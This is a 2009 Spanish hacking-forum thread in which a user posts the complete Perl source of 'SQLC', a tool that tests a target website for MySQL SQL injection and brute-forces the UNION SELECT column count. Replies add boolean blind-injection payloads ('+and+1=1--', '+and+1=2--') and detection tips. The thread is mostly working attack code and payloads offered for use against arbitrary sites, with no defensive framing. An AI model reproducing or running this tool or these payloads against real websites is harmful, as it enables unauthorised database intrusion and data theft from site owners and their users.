 Autor
|
Tema: [Tool] SQLC (SQL Columnator) - by xassiz (Leído 6,930 veces)
|
xassiz_
 Desconectado
Mensajes: 273
Ich werde dich töten..
|
SQLC (SQL Columnator) - by xassiz SQLC es mi herramienta en Perl, capaz de devolverte el número de columnas de una web, luego de comprobar si realmente es vulnerable. Un ejemplo de su uso:  Aquí teneis el código: #!/usr/bin/perl use LWP::UserAgent; if (!$ARGV[0]) { .d8888. .d88b. db .o88b. 88' YP .8P Y8. 88 d8P Y8 `8bo. 88 88 88 8P `Y8b. 88 88 88 8b db 8D `8P d8' 88booo. Y8b d8 `8888Y' `Y88'Y8 Y88888P `Y88P' [+] Modo de uso: perl SQLC.pl http://www.target.com/news.php?id= ------------------------------- Coded by xassiz ); } .d8888. .d88b. db .o88b. 88' YP .8P Y8. 88 d8P Y8 `8bo. 88 88 88 8P `Y8b. 88 88 88 8b db 8D `8P d8' 88booo. Y8b d8 `8888Y' `Y88'Y8 Y88888P `Y88P' ); $target = $ARGV[0]; print("\n [+] Website a atacar: $target \n\n"); print("\n [?] Comprobando vulnerabilidad \n"); $vulnerabilidad = LWP ::UserAgent->new() or die; $comprobacion = $vulnerabilidad->get($target."-1+union+select+69--"); if ($comprobacion->content =~ /The used SELECT statements have a different number of columns/ || $comprobacion->content =~ /You have an error in your SQL syntax/ || $comprobacion->content =~ /mysql_fetch/ || $comprobacion->content =~ /mysql_num_rows/ || $comprobacion->content =~ /MySQL/) { print("\n [+] Objetivo Vulnerable \n\n\a"); print("\n [?] Buscando numero de columnas \n"); $count = 2; $max = 500; $precolumnator = LWP ::UserAgent->new() or die; $precolumns = $precolumnator->get($target."-1+union+select+0x78617373697a--"); if ($precolumns->content =~ /xassiz/) { print("\n [+] La website tiene 1 columna \n\n\a"); } $inject = ",0x78617373697a"; while ($count <= $max) { $columnator = LWP ::UserAgent->new() or die; $columns = $columnator->get($target."-1+union+select+0x78617373697a".$inject."--"); if ($columns->content =~ /xassiz/) { print("\n [+] La website tiene $count columnas \n\n\a"); } $inject = $inject.",0x78617373697a"; $count ++; } print("\n [-] No se encontro el numero de columnas \n\n\a"); } else { print("\n [-] Objetivo No Vulnerable \n\n\a"); } #Autor = xassiz; #Blog = http://xassiz.blogspot.com;
Espero que os guste amigos! Saludos  PD: podeis complementarla con SQL Copy Column, que le indicas el numero de columnas y directamente te pone la inyección en el portapapeles 
|
|
|
|
« Última modificación: 22 Diciembre 2009, 19:05 pm por אครรเz »
|
En línea
|
 YXVuIGVyZXMgbWF0YWRvIHBhcmEgcG9uZXJ0ZSBhIGRlc2NpZnJhciBlc3RvIHhE |
|
|
|
WHK
|
Hola, está entretenido, lo voy a agregar al post de recopilaciones  aver si le das un par de actualizaciones para que sea cada ves mejor . Saludos. |
|
|
|
|
En línea
|
|
|
|
xassiz_
Desconectado
Mensajes: 273
Ich werde dich töten..
|
Hola, está entretenido, lo voy a agregar al post de recopilaciones aver si le das un par de actualizaciones para que sea cada ves mejor . Saludos. Gracias WHK  Hay que contar que es mi primera tool en perl xD
|
|
|
|
|
En línea
|
YXVuIGVyZXMgbWF0YWRvIHBhcmEgcG9uZXJ0ZSBhIGRlc2NpZnJhciBlc3RvIHhE |
|
|
~ Yoya ~
Wiki
Desconectado
Mensajes: 1.125
|
pss, dectecta solo sqli si la web tira errores o si no no, porque no hases un +and+1=1 y +and+1=0 y luego conparas el codigo de fuente aver si son iguales y diferentes... Con eso puedes dectectar si es vulnerable.
Saludos!
|
|
|
|
|
En línea
|
Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.
|
|
|
08l00D
Desconectado
Mensajes: 168
|
pss, dectecta solo sqli si la web tira errores o si no no, porque no hases un +and+1=1 y +and+1=0 y luego conparas el codigo de fuente aver si son iguales y diferentes... Con eso puedes dectectar si es vulnerable.
Saludos!
No siempre, muchas webs renuevan su contenido dinamicamente y por lo tanto se cambia el codigo de la web tambien ...
|
|
|
|
|
En línea
|
|
|
|
~ Yoya ~
Wiki
Desconectado
Mensajes: 1.125
|
si es vulnerable a sqli debe funcionar, ya que dectecta los posibles errores sqli y si no tira errores no lo dectecta, aunque sea vulnerable a sqli, yo tengo una tools similar y al principio la hice que dectecte los posibles errores sqli y por muchas recomendaciones la hice que conparara el numero de lineas. if ($comprobacion->content =~ /The used SELECT statements have a different number of columns/ || $comprobacon->content =~ /You have an error in your SQL syntax/ || $comprobacion->content =~ /mysql_fetch/ || $comprobacion->content =~ /mysql_num_rows/ || $comprobacion->content =~ /MySQL/)
{ |
|
|
|
|
En línea
|
Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.
|
|
|
YST
Desconectado
Mensajes: 965
I'm you
|
si es vulnerable a sqli debe funcionar, ya que dectecta los posibles errores sqli y si no tira errores no lo dectecta, aunque sea vulnerable a sqli, yo tengo una tools similar y al principio la hice que dectecte los posibles errores sqli y por muchas recomendaciones la hice que conparara el numero de lineas. if ($comprobacion->content =~ /The used SELECT statements have a different number of columns/ || $comprobacon->content =~ /You have an error in your SQL syntax/ || $comprobacion->content =~ /mysql_fetch/ || $comprobacion->content =~ /mysql_num_rows/ || $comprobacion->content =~ /MySQL/)
{ Esas me suenan a las palabras de OzX  ¿El te lo recomendo no ? Por que en varias tool lo hacia de esa manera Por cierto esa es una estupenda manera contando el numero de "\n"
|
|
|
|
|
En línea
|
  Yo le enseñe a Kayser a usar objetos en ASM |
|
|
~ Yoya ~
Wiki
Desconectado
Mensajes: 1.125
|
Sip, al principio yo comparava los dos codigos de fuente aver si heran iguales y asi era mas lento y gastaba mas recursos, luego me recomendo que saque el numero de lineas y lo compare xD.
Gran tio xD.
|
|
|
|
|
En línea
|
Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.
|
|
|
xassiz_
Desconectado
Mensajes: 273
Ich werde dich töten..
|
Sip, al principio yo comparava los dos codigos de fuente aver si heran iguales y asi era mas lento y gastaba mas recursos, luego me recomendo que saque el numero de lineas y lo compare xD.
Gran tio xD.
No me estoy enterando mucho de lo que decís xD A que os referís con el número de lineas? del codigo de la pagina entera?
|
|
|
|
|
En línea
|
YXVuIGVyZXMgbWF0YWRvIHBhcmEgcG9uZXJ0ZSBhIGRlc2NpZnJhciBlc3RvIHhE |
|
|
~ Yoya ~
Wiki
Desconectado
Mensajes: 1.125
|
Ej: Tengo esta url vulnerable a SQLI www.pagina.com/index.php?ud=1 Entonse hare dos peticiones, una con +and+1=1-- y otra con +and+1=2-- Y quedaria asi: www.pagina.com/index.php?ud=1+and+1=1--
www.pagina.com/index.php?ud=1+and+1=2-- Le hago una peticion get a cada una y guardo el codigo de fuente en dos variables o arrays. Luego le saco el numero de linea a una variable que almacena el codigo de fuente y le saco el numero de linea a la otra variable que almacena el codigo de fuente, luego si el numero de linea de las dos variables son iguales la web no es vulnerable pero si los numeros de linea son diferente las web es vulnerable. |
|
|
|
|
En línea
|
Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.
|
|
|
|
 |
- 
![WWW](data:text/html,<img src="http://img199.imageshack.us/img199/7002/norris.gif" />;http://)
